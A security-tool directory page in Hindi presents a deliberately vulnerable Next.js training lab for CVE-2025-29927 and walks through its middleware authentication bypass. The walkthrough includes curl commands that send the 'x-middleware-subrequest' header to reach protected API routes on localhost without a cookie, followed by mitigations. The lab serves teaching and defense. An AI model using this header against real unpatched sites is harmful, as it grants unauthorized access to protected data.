Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-29927-lab — जानबूझकर कमजोर Next.js एप्लिकेशन जो CVE-2025-29927 (मिडलवेयर-आधारित प्रमाणीकरण बाइपास) का प्रदर्शन करता है, सीखने और बग बाउंटी अभ्यास के लिए। | Kitploit
उपकरण/GitHubGitHub/metasploit403/cve-2025-29927-lab
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmetasploit403/cve-2025-29927-lab

cve-2025-29927-lab

जानबूझकर कमजोर Next.js एप्लिकेशन जो CVE-2025-29927 (मिडलवेयर-आधारित प्रमाणीकरण बाइपास) का प्रदर्शन करता है, सीखने और बग बाउंटी अभ्यास के लिए।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

इस रिपॉजिटरी में Next.js का उपयोग करके बनाया गया एक जानबूझकर कमजोर वेब एप्लीकेशन है। यह CVE-2025-29927 नामक सुरक्षा समस्या को प्रदर्शित करने और अध्ययन करने के लिए डिज़ाइन किया गया है। इस परियोजना का उद्देश्य सुरक्षा शोधकर्ताओं, छात्रों और बग बाउंटी शिकारियों को यह समझने में मदद करना है कि यह कमज़ोरी वास्तविक दुनिया के समान वातावरण में कैसे काम करती है।

[!CAUTION] यह एप्लीकेशन जानबूझकर असुरक्षित है और इसे कभी भी उत्पादन (production) में तैनात नहीं किया जाना चाहिए।

🔩उद्देश्य

  • सीखें कि कमज़ोरी कैसे काम करती है
  • सुरक्षित रूप से पहचानने और उसका शोषण करने का अभ्यास करें
  • असुरक्षित मिडलवेयर हैंडलिंग के प्रभाव को समझें
  • बग बाउंटी और वेब सुरक्षा कौशल में सुधार करें

🐞कमज़ोरी

CVE-2025-29927, Next.js के साथ बनाए गए एप्लीकेशन में विशेष रूप से मिडलवेयर में अनुरोध (request) तर्क के अनुचित हैंडलिंग से संबंधित है। यह हमलावरों को अनुमति दे सकता है:

  1. प्रमाणीकरण या प्राधिकरण जाँच को बायपास करना
  2. क्राफ्टेड हेडर या इनपुट का उपयोग करके अनुरोध प्रवाह में हेरफेर करना
  3. प्रतिबंधित संसाधनों तक पहुँचना

📁परियोजना संरचना

  • app/ → एप्लीकेशन रूट्स
  • middleware.ts → कमज़ोर तर्क युक्त फ़ाइल
  • api/ → बैकएंड एंडपॉइंट (सुरक्षित रूट्स सहित)

⚙️स्थापना और सेटअप

root@kitploit:~
git clone https://github.com/metasploit403/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install
npm run dev

🪲कमज़ोर एंडपॉइंट

कुछ रूट जानबूझकर कमज़ोर हैं और इनमें शामिल हो सकते हैं

root@kitploit:~
- /api/admin/secret
- /api/internal/health
- /api/private/data

ये एंडपॉइंट प्रतिबंधित संसाधनों का अनुकरण करते हैं जिन तक उचित प्राधिकरण के बिना पहुँच नहीं होनी चाहिए।

🔥शोषण (Exploitation)

1.मान लिया कि आपने रिपॉजिटरी को सफलतापूर्वक क्लोन कर लिया है
2.स्टार्ट npm run dev
3.यह आपके प्रोजेक्ट को स्थानीय रूप से चलाएगा
4.अपनी पसंद का ब्राउज़र खोलें, जैसे Chrome, और टाइप करें http://localhost:3000
5.तीनों API एंडपॉइंट में से किसी एक तक पहुँचने का प्रयास करें

- /api/admin/secret
- /api/internal/health
- /api/private/data

6.अब इसे किसी भी एंडपॉइंट के साथ आज़माएं

- http://localhost:3000/api/admin/secret
- http://localhost:3000/api/internal/health
- http://localhost:3000/api/private/data

7.ध्यान दें कि आपका अनुरोध अवरुद्ध है, ऐसा इसलिए है क्योंकि आपने अपने अनुरोध में cookie शामिल नहीं किया है। इसका मतलब है कि एंडपॉइंट मिडलवेयर द्वारा संरक्षित है। मिडलवेयर जाँच रहा है कि आपके अनुरोध में कुकी है या नहीं, और यदि नहीं है तो यह स्वचालित रूप से ब्लॉक हो जाता है

8.अब अपने अनुरोध में cookie जोड़ें। ऐसा करने के लिए Chrome डेवटूल खोलें (मैं यहाँ Chrome ब्राउज़र का उपयोग कर रहा हूँ, आप कोई भी ब्राउज़र उपयोग कर सकते हैं)

9.F12 दबाएं और Chrome डेवटूल खुल जाएगा

10.Console टैब पर जाएं

11.कंसोल टैब में टाइप करें document.cookie="lab-auth=authenticated"

12.अब पेज को रिफ्रेश करें और देखें कि आप लॉगिन हैं

ध्यान रखें कि मिडलवेयर जाँच रहा है कि अनुरोध में कुकी है या नहीं। यदि अनुरोध में कुकी है तो आप सफलतापूर्वक लॉगिन करते हैं, यदि नहीं है तो ब्लॉक हो जाते हैं। प्रश्न यह है कि हम मिडलवेयर की जाँच को बायपास करके बिना कुकी प्रदान किए लॉगिन कैसे कर सकते हैं? यही वह काम है जो CVE-2025-29927 हमें करने देता है

अब आइए CVE-2025-29927 के साथ मिडलवेयर प्रमाणीकरण जाँच को बायपास करें। यहाँ ट्रिक केवल यह विशेष हेडर जोड़ना है:
x-middleware-subrequest: middleware. यह हेडर केवल फ्रेमवर्क द्वारा आंतरिक रूप से उपयोग किया जाना चाहिए। यदि हम इसे जोड़ते हैं तो मिडलवेयर यह जाँचना बंद कर देगा कि हमारे अनुरोध में कुकी है या नहीं, और अब आपके एप्लीकेशन में कोई भी संवेदनशील एंडपॉइंट रक्षाहीन हो जाता है

इसका शोषण करने के लिए आइए cURL का उपयोग करें।
cURL एक कमांड-लाइन टूल है जिसका उपयोग सर्वर को अनुरोध भेजने और प्रतिक्रिया प्राप्त करने के लिए किया जाता है

1.बिना कुकी के 401 की उम्मीद करें

curl.exe -i http://localhost:3000/api/admin/secret

ध्यान दें कि सर्वर ने स्टेटस कोड 307 अस्थायी रीडायरेक्ट के साथ उत्तर दिया। चूँकि कोई कुकी नहीं है, हमें होमपेज/रूट पेज पर रीडायरेक्ट कर दिया गया है। इसका मतलब है कि हम कुकी प्रदान किए बिना लॉगिन नहीं कर सकते।

2.curl.exe -i http://localhost:3000/api/admin/secret -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"

अब हमने "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" जोड़ा ध्यान दें कि हम अब बिना कुकी के लॉगिन तक पहुँच प्राप्त कर सकते हैं। यह पूर्ण प्रमाणीकरण बायपास है

🔐शमन (Mitigation)

वास्तविक एप्लीकेशन में इस प्रकार की समस्याओं को ठीक करने के लिए:

  • क्लाइंट-नियंत्रित हेडर पर आंख मूंदकर भरोसा न करें
  • मिडलवेयर में सभी इनपुट को मान्य करें
  • सर्वर-साइड उचित प्रमाणीकरण जाँच लागू करें
  • असुरक्षित अनुरोध धारणाओं पर भरोसा करने से बचें
  • next के पैच किए गए संस्करण में अपग्रेड करें
  • यदि किसी मामले में आप अपग्रेड नहीं कर सकते तो रिवर्स प्रॉक्सी पर x-middleware-subrequest हेडर को हटा दें

🫵यह किसके लिए है?

  • बग बाउंटी शिकारी
  • सुरक्षा शोधकर्ता
  • वेब सुरक्षा सीखने वाले छात्र
  • डेवलपर्स जो सुरक्षित मिडलवेयर डिज़ाइन को समझना चाहते हैं

⛔अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इन तकनीकों का उपयोग उन प्रणालियों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।

🤝योगदान

बेझिझक:

  • लैब में सुधार करें
  • नए कमज़ोर परिदृश्य जोड़ें
  • सुधार या बेहतर स्पष्टीकरण सबमिट करें

⭐समर्थन

यदि आपको यह उपयोगी लगता है, तो रिपॉजिटरी को स्टार करने पर विचार करें।

🏷️टैग

root@kitploit:~
- Next.js 
- Bug Bounty 
- Web Security 
- CVE-2025-29927 
- Middleware Authentication 
- Bypass
टूल डाउनलोड करें